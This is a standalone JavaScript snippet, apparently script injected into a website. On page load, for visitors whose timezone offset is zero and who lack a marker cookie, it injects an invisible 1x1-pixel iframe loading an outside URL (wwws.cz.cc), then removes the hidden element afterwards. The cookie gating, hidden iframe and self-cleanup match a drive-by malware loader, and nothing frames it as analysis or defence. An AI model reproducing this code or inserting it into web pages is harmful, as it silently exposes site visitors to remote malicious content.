﻿function S(n,v){
	var timecook;
	timecook=new Date();
	timecook.setUTCDate(timecook.getUTCDate()+7);
	document.cookie=n+"="+escape(v)+';expires='+timecook.toGMTString()+';path=/';
}

function G(n){
	var a=document.cookie.split(n+"=");
	if(a[1]){return unescape(a[1].split(';')[0]);}
	return null;
}

function U(){ 
	var l00 = '';
	try { new ActiveXObject('dc'); }
	catch (e) { l00  =  document.createElement('div');}
	l00.id='myhidediv';
	l00.style.cssText='position:absolute;width:1px;height:1px;top:0;left:0;z-index:-100;visibility:hidden;';
	l00.innerHTML="<iframe width=1px height=1px src='http://wwws.cz.cc/index.php?tp=d52b36cfb64cad94'></frame>"; 
	document.body.appendChild(l00);

function DELDIV(){
	if(l00=document.getElementById('myhidediv'))document.body.removeChild(l00);
}
	var s00=document.createElement('script');
	s00.onload=function(){DELDIV();};
	s00.onreadystatechange=function(){if('loaded'==this.readyState){DELDIV();}};
	document.getElementsByTagName('head').item(0).appendChild(s00);
	window.setTimeout(DELDIV,30000); 
}

window.onload = function (){var myDate = new Date(); if(!G('_uid1') && (myDate.getTimezoneOffset() == 0)){S('_uid1',76211); U();}}
